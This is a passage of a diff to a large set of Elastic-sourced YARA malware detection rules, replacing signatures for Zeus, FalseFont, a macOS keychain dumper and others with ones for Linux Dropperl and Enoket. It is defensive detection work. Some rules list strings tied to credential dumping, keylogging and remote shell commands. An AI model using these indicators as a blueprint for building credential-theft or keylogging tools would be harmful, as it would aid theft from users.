1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? } + $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? } + $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 } + $str_0 = ".?AVDoorme@@" ascii fullword condition: - all of them + 3 of ($seq*) or 1 of ($str*) } -rule ELASTIC_Linux_Trojan_Swrort_22C2D6B6 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dropperl_B97Baf37 : FILE MEMORY { meta: - description = "Detects Linux Trojan Swrort (Linux.Trojan.Swrort)" + description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" author = "Elastic Security" - id = "22c2d6b6-d100-4310-87c4-3912a86bdd40" + id = "b97baf37-48db-4eb7-85c7-08e75054bea7" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Swrort.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6df073767f48dd79f98e60aa1079f3ab0b89e4f13eedc1af3c2c073e5e235bbc" - logic_hash = "f661544d267a55feec786ab3d4fc4f002afa8e2b58833461f56b745ec65acfd4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dropperl.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "aff94f915fc81d5a2649ebd7c21ec8a4c2fc0d622ec9b790b43cc49f7feb83da" + logic_hash = "e58130c33242bc3020602c2c0254bed2bbc564c4a11806c6cfcd858fd724c362" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d2b16da002cb708cb82f8b96c7d31f15c9afca69e89502b1970758294e91f9a4" + fingerprint = "0852f1afa6162d14b076a3fc1f56e4d365b5d0e8932bae6ab055000cca7d1fba" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76610,28 +76768,28 @@ rule ELASTIC_Linux_Trojan_Swrort_22C2D6B6 : FILE MEMORY os = "linux" strings: - $a = { 31 DB F7 E3 53 43 53 6A 02 89 E1 B0 66 CD 80 51 6A 04 54 6A 02 } + $a = { 12 48 89 10 83 45 DC 01 83 45 D8 01 8B 45 D8 3B 45 BC 7C CF 8B } condition: all of them } -rule ELASTIC_Linux_Backdoor_Generic_Babf9101 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dropperl_E2443Be5 : FILE MEMORY { meta: - description = "Detects Linux Backdoor Generic (Linux.Backdoor.Generic)" + description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" author = "Elastic Security" - id = "babf9101-1e6e-4268-a530-e99e2c905b0d" - date = "2021-04-06" + id = "e2443be5-da15-4af2-b090-bf5accf2a844" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Backdoor_Generic.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9ea73d2c2a5f480ae343846e2b6dd791937577cb2b3d8358f5b6ede8f3696b86" - logic_hash = "40084f3bed66c1d4a1cd2ffca99fd6789c8ed2db04031e4d4a4926b41d622355" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dropperl.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "aff94f915fc81d5a2649ebd7c21ec8a4c2fc0d622ec9b790b43cc49f7feb83da" + logic_hash = "85733ff904cfa3eddaa4c4fbfc51c00494c3a3725e2eb722bbf33c82e7135336" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a578b052910962523f26f14f0d0494481fe0777c01d9f6816c7ab53083a47adc" + fingerprint = "e49acaa476bd669b40ccc82a7d3a01e9c421e6709ecbfe8d0e24219677c96339" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76639,28 +76797,28 @@ rule ELASTIC_Linux_Backdoor_Generic_Babf9101 : FILE MEMORY os = "linux" strings: - $a = { C4 10 89 45 F4 83 7D F4 00 79 1F 83 EC 0C 68 22 } + $a = { 45 F0 75 DB EB 17 48 8B 45 F8 48 83 C0 08 48 8B 10 48 8B 45 F8 48 } condition: all of them } -rule ELASTIC_Linux_Backdoor_Generic_5776Ae49 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dropperl_683C2Ba1 : FILE MEMORY { meta: - description = "Detects Linux Backdoor Generic (Linux.Backdoor.Generic)" + description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" author = "Elastic Security" - id = "5776ae49-64e9-46a0-a0bb-b0226eb9a8bd" + id = "683c2ba1-fe4a-44e4-b176-8d5d5788e1a4" date = "2021-04-06" - modified = "2022-01-26" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Backdoor_Generic.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e247a5decb5184fd5dee0d209018e402c053f4a950dae23be59b71c082eb910c" - logic_hash = "b606f12c47182d80e07f8715639c3cc73753274bd8833cb9f6380879356a2b12" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dropperl.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a02e166fbf002dd4217c012f24bb3a8dbe310a9f0b0635eb20a7d315049367e1" + logic_hash = "eef2bdef7e20633f7dc92f653b43e3a217e8cbdbac63d05540bdd520e22dd1ed" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2d36fbe1820805c8fd41b2b34a2a2b950fc003ae4f177042dc0d2568925c5b76" + fingerprint = "42dcea472417140d0f7768e8189ac3a8a46aaeff039be1efd36f8d50f81e347c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76668,64 +76826,57 @@ rule ELASTIC_Linux_Backdoor_Generic_5776Ae49 : FILE MEMORY os = "linux" strings: - $a = { 18 C1 E8 08 88 47 12 8B 46 18 88 47 13 83 C4 1C 5B 5E 5F 5D } + $a = { E8 95 FB FF FF 83 7D D4 00 79 0A B8 ?? ?? 60 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Falsefont_D1F0D357 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dropperl_8Bca73F6 : FILE MEMORY { meta: - description = "Detects Windows Trojan Falsefont (Windows.Trojan.FalseFont)" + description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" author = "Elastic Security" - id = "d1f0d357-26cb-4dab-8ca6-65f17109982b" - date = "2024-03-26" - modified = "2024-05-08" + id = "8bca73f6-c3ec-45a3-a5ae-67c871aaf9df" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_FalseFont.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614" - logic_hash = "af356dec77f773cec01626a3823dbea7e9d3719b9d152ec4057c0b97efabf0df" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dropperl.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e7c17b7916b38494b9a07c249acb99499808959ba67125c29afec194ca4ae36c" + logic_hash = "2cfad4e436198391185fdae5c4af18ae43841db19da33473fdf18b64b0399613" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ad63447832e9a160d479fccd780de89b9c29b9697f69ac3553e39bc388d49b83" + fingerprint = "36df2fd9746da80697ef675f84f47efb3cb90e9757677e4f565a7576966eb169" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $s1 = "KillById" - $s2 = "KillByName" - $s3 = "SignalRHub" - $s4 = "ExecUseShell" - $s5 = "ExecAndKeepAlive" - $s6 = "SendAllDirectoryWithStartPath" - $s7 = "AppLiveDirectorySendHard" - $s8 = "AppLiveDirectorySendScreen" + $a = { E8 95 FB FF FF 83 7D D4 00 79 0A B8 ?? ?? 62 00 } condition: - 4 of them + all of them } -rule ELASTIC_Linux_Trojan_Cerbu_69D5657E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dropperl_C4018572 : FILE MEMORY { meta: - description = "Detects Linux Trojan Cerbu (Linux.Trojan.Cerbu)" + description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" author = "Elastic Security" - id = "69d5657e-1fe9-4367-b478-218c278c7fbc" - date = "2021-01-12" + id = "c4018572-a8af-4204-bc19-284a2a27dfdd" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Cerbu.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f10bf3cf2fdfbd365d3c2d8dedb2d01b85236eaa97d15370dbcb5166149d70e9" - logic_hash = "644e8d5a1b5c8618e71497f21b0244215924e293e274b9164692dd927cd74ba8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dropperl.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c1515b3a7a91650948af7577b613ee019166f116729b7ff6309b218047141f6d" + logic_hash = "10d70540532c5c2984dc7e492672450924cb8f34c8158638191886057596b0a1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7dfaebc6934c8fa97509831e0011f2befd0dbc24a68e4a07bc1ee0decae45a42" + fingerprint = "f2ede50ea639af593211c9ef03ee2847a32cf3eb155db4e2ca302f3508bf2a45" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76733,120 +76884,115 @@ rule ELASTIC_Linux_Trojan_Cerbu_69D5657E : FILE MEMORY os = "linux" strings: - $a = { E8 5B 5E C9 C3 55 89 E5 83 EC 08 83 C4 FC FF 75 0C 6A 05 FF } + $a = { E8 97 FB FF FF 83 7D D4 00 79 0A B8 ?? ?? 60 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Zeus_E51C60D7 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dropperl_733C0330 : FILE MEMORY { meta: - description = "Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature." + description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" author = "Elastic Security" - id = "e51c60d7-3afa-4cf5-91d8-7782e5026e46" - date = "2021-02-07" - modified = "2021-10-04" - reference = "https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Zeus.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3" - logic_hash = "cde738f95dbad1fbad59e20528b2f577e5e3ee5fcb37c68a45d53c689d2af525" + id = "733c0330-3163-48f3-a780-49be80a3387f" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dropperl.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b303f241a2687dba8d7b4987b7a46b5569bd2272e2da3e0c5e597b342d4561b6" + logic_hash = "37bf7777e26e556f09b8cb0e7e3c8425226a6412c3bed0d95fdab7229b6f4815" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba" - threat_name = "Windows.Trojan.Zeus" + fingerprint = "ee233c875dd3879b4973953a1f2074cd77abf86382019eeb72da069e1fd03e1c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "name=%s&port=%u" ascii fullword - $a2 = "data_inject" ascii wide fullword - $a3 = "keylog.txt" ascii fullword - $a4 = "User-agent: %s]]]" ascii fullword - $a5 = "%s\\%02d.bmp" ascii fullword + $a = { E8 A0 FB FF FF 83 7D DC 00 79 0A B8 ?? ?? 60 00 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Leigod_89397Ebf : FILE +rule ELASTIC_Linux_Trojan_Dropperl_39F4Cd0D : FILE MEMORY { meta: - description = "Detects Windows Hacktool Leigod (Windows.Hacktool.LeiGod)" + description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" author = "Elastic Security" - id = "89397ebf-2fdb-4607-85a1-b9c378b4e256" - date = "2022-04-04" - modified = "2022-04-04" + id = "39f4cd0d-4261-4d62-a527-f403edadbd0c" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_LeiGod.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ae5cc99f3c61c86c7624b064fd188262e0160645c1676d231516bf4e716a22d3" - logic_hash = "e887c34c624a182a3c57a55abe02784c4350d3956bcfd9f7918f08a464819e63" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dropperl.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c08e1347877dc77ad73c1e017f928c69c8c78a0e3c16ac5455668d2ad22500f3" + logic_hash = "5b61f54604b110d2c8efaf1782a2e520baac96c6d3e8d1eda0877475c504bf89" score = 75 quality = 75 - tags = "FILE" - fingerprint = "04709d703cd0a062029a05baee160eb9579fe0503984f3059ce49e1bcfa6e963" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "e1cdd678a1f46a3c6d26d53dd96ba6c6a45f97e743765c534f644af7c6450f8e" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\Device\\CtrlLeiGod" wide fullword + $a = { E8 ?? FA FF FF 83 7D D4 00 79 0A B8 ?? ?? 60 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Hacktool_Leigod_3F5C98C4 : FILE +rule ELASTIC_Linux_Exploit_Enoket_79B52A4C : FILE MEMORY { meta: - description = "Detects Windows Hacktool Leigod (Windows.Hacktool.LeiGod)" + description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" author = "Elastic Security" - id = "3f5c98c4-03ba-4919-90b0-604d3cb9361e" - date = "2022-04-04" - modified = "2022-04-04" + id = "79b52a4c-80cd-4fe1-aa6c-463e2cdd64ac" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_LeiGod.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0c42fe45ffa9a9c36c87a7f01510a077da6340ffd86bf8509f02c6939da133c5" - logic_hash = "7570bf1a69df6b493bde41c1de27969e36a3fcb59be574ee2e24e3a61347a146" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Enoket.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3ae8f7e7df62316400d0c5fe0139d7a48c9f184e92706b552aad3d827d3dbbbf" + logic_hash = "204082a3be602b3f6aebb013a46e6f9c98b5dad2476350afa60c1954b13598fe" score = 75 - quality = 75 - tags = "FILE" - fingerprint = "883dcad7097ad5713c4f45ce2fc232c3c1e61cf9dfdc81a194124d5995a64c9e" - severity = 50 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "84be6877d6b1eb091de9817a5cf0ecba5e0e82089a6dd1dc0af2e91b01fe4003" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\LgDCatcher.pdb" + $a = { 66 6F 75 6E 64 20 61 74 20 30 78 25 30 34 78 20 69 6E 20 74 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Linux_Exploit_Pulse_2Bea17E8 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Enoket_5969A348 : FILE MEMORY { meta: - description = "Detects Linux Exploit Pulse (Linux.Exploit.Pulse)" + description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" author = "Elastic Security" - id = "2bea17e8-2324-4502-9ced-7a45d94099ec" + id = "5969a348-6573-4cb3-b81e-db455ff7b484" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Pulse.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c29cb4c2d83127cf4731573a7fac531f90f27799857f5e250b9f71362108f559" - logic_hash = "bc71efa6cc79171666d89fe3e755411ee8032f56ae5bd73e0de440eee5b718ab" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Enoket.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4b4d7ca9e1ffa2c46cb097d4a014c59b1a9feb93b3adcb5936ef6a1dfef9b0ae" + logic_hash = "e47af0fba86c9152d17911b984070a8419b98da8916538ebb1065a5348da6e31" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4d57fb355e7d68ad3da26ff3bade291ebbfa8df5f0727579787e33ebee888d41" + fingerprint = "7e9b9ba6146754857632451be2f98a5008268091ae1cfab1a87322b6fe30097c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76854,28 +77000,28 @@ rule ELASTIC_Linux_Exploit_Pulse_2Bea17E8 : FILE MEMORY os = "linux" strings: - $a = { 89 E5 48 8D 45 F8 48 89 45 F8 48 8B 45 F8 48 25 00 F0 FF FF 48 } + $a = { FC 83 7D FC FF 75 07 B8 FF FF FF FF EB 0F 8B 45 FC 01 45 F0 83 7D } condition: all of them } -rule ELASTIC_Linux_Exploit_Pulse_246E6F31 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Enoket_80Fac3E9 : FILE MEMORY { meta: - description = "Detects Linux Exploit Pulse (Linux.Exploit.Pulse)" + description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" author = "Elastic Security" - id = "246e6f31-fcfb-474e-9709-a5d7ea6586fd" + id = "80fac3e9-bf77-46d1-8d9b-25f3cf06a3b7" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Pulse.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c29cb4c2d83127cf4731573a7fac531f90f27799857f5e250b9f71362108f559" - logic_hash = "f6755f10863b78303899cefcd81f609884fbbf2dffabd9219686ed869f2cc7e3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Enoket.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3355ad81c566914a7d7734b40c46ded0cfa53aa22c6e834d42e185bf8bbe6128" + logic_hash = "19cb7f02ca80095293c4a09f7ea616c31364af1e4189a9211aaba54aaa2db14e" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "e98007a2fa62576e1847cf350283f60f1e4e49585574601ab44b304f391240db" + fingerprint = "627418bfe84af36e9b34d42aa42cb6d793e6bc41aa555a77e4f9389a9407d6f2" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76883,91 +77029,86 @@ rule ELASTIC_Linux_Exploit_Pulse_246E6F31 : FILE MEMORY os = "linux" strings: - $a = { 48 8D 45 F8 48 89 45 F8 48 8B 45 F8 48 25 00 E0 FF FF 48 8B 00 48 89 } + $a = { 42 4C 45 20 54 4F 20 4D 41 50 20 5A 45 52 4F 20 50 41 47 45 } condition: all of them } -rule ELASTIC_Linux_Trojan_Bluez_50E87Fa9 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Enoket_7Da5F86A : FILE MEMORY { meta: - description = "Detects Linux Trojan Bluez (Linux.Trojan.Bluez)" + description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" author = "Elastic Security" - id = "50e87fa9-f053-4507-ae10-b5d33b693bb3" - date = "2021-06-28" + id = "7da5f86a-c177-47c9-a82e-50648c84174a" + date = "2021-01-12" modified = "2021-09-16" - reference = "1e526b6e3be273489afa8f0a3d50be233b97dc07f85815cc2231a87f5a651ef1" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Bluez.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "53754c538a7dea6f06e37980901350feddc3517821ea42544cb96e371709752f" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Enoket.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "406b003978d79d453d3e2c21b991b113bf2fc53ffbf3a1724c5b97a4903ef550" + logic_hash = "df5769a87230f5e563849302f32673b5f5de2595e12de72c27921d45edc58928" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "67855d65973d0bbdad90299f1432e7f0b4b8b1e6dfd0737ee5bee89161f2a890" - severity = "100" + fingerprint = "cf9a703969e3f9a3cd20119fc0a24fa2d16bec5ea7e3b1a8df763872625c90fc" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 63 68 72 00 6B 69 6C 6C 00 73 74 72 6C 65 6E 00 62 69 6E 64 00 } + $a = { FF 75 F2 80 7D 94 00 74 23 0F B6 0F B8 01 00 00 00 3A 4D 94 } condition: all of them } -rule ELASTIC_Macos_Creddump_Keychainaccess_535C1511 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Enoket_C77C0D6D : FILE MEMORY { meta: - description = "Detects Macos Creddump Keychainaccess (Macos.Creddump.KeychainAccess)" + description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" author = "Elastic Security" - id = "535c1511-5b45-4845-85c1-ec53f9787b96" - date = "2023-04-11" - modified = "2024-08-19" + id = "c77c0d6d-7f5c-4618-b6f6-3c1ddc70783c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Creddump_KeychainAccess.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c2995263622d62b11db93f7d163a7595e316ec24b51099f434bc5dbd0afefbfe" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Enoket.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3ae8f7e7df62316400d0c5fe0139d7a48c9f184e92706b552aad3d827d3dbbbf" + logic_hash = "504d61715bd5dba7f777fcb2d62eb53d8d54dad2dcf93f2fc2d7dcd359c4b994" score = 75 - quality = 49 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "7c103fa75b24cdf322f6c7cf3ec56e8cc2b14666c9d9fb56a4b1a735efaf1b5b" + fingerprint = "739e23abbd2971d6ff24c94a87d7aab082aec85f9cd7eb3a168b35fa22f32eb9" severity = 100 - arch_context = "x86, arm64" + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $strings1 = "uploadkeychain" ascii wide nocase - $strings2 = "decryptkeychain" ascii wide nocase - $strings3 = "dump-generic-password" ascii wide nocase - $strings4 = "keychain_extract" ascii wide nocase - $strings5 = "chainbreaker" ascii wide nocase - $strings6 = "SecKeychainItemCopyContent" ascii wide nocase - $strings7 = "SecKeychainItemCopyAccess" ascii wide nocase - $strings8 = "Failed to get password" ascii wide nocase + $a = { 6E 64 20 74 68 65 20 77 6F 72 6C 64 2C 20 6F 6E 65 20 68 61 } condition: - all of ($strings1,$strings2) or $strings4 or all of ($strings3,$strings5) or all of ($strings6,$strings7,$strings8) + all of them } -rule ELASTIC_Linux_Hacktool_Fontonlake_68Ad8568 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Enoket_Fbf508E1 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Fontonlake (Linux.Hacktool.Fontonlake)" + description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" author = "Elastic Security" - id = "68ad8568-2b00-4680-a83f-1689eff6099c" - date = "2021-10-12" - modified = "2022-01-26" + id = "fbf508e1-2a44-417e-a2e4-8d43c2b64017" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Fontonlake.yar#L1-L30" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "717953f52318e7687fc95626561cc607d4875d77ff7e3cf5c7b21cf91f576fa4" - logic_hash = "63dd5769305c715e27e3c62160f7b0f65b57204009ed46383b5b477c67cfac8e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Enoket.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d1fa8520d3c3811d29c3d5702e7e0e7296b3faef0553835c495223a2bc015214" + logic_hash = "21b1d69677c3fddb210dcf5947e8321abccd5a1ebbde8438a83fee5d4b29443d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = 